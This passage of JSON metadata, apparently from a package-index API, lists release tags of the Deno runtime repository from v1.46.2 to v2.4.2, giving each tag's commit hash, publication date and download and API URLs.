4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"pur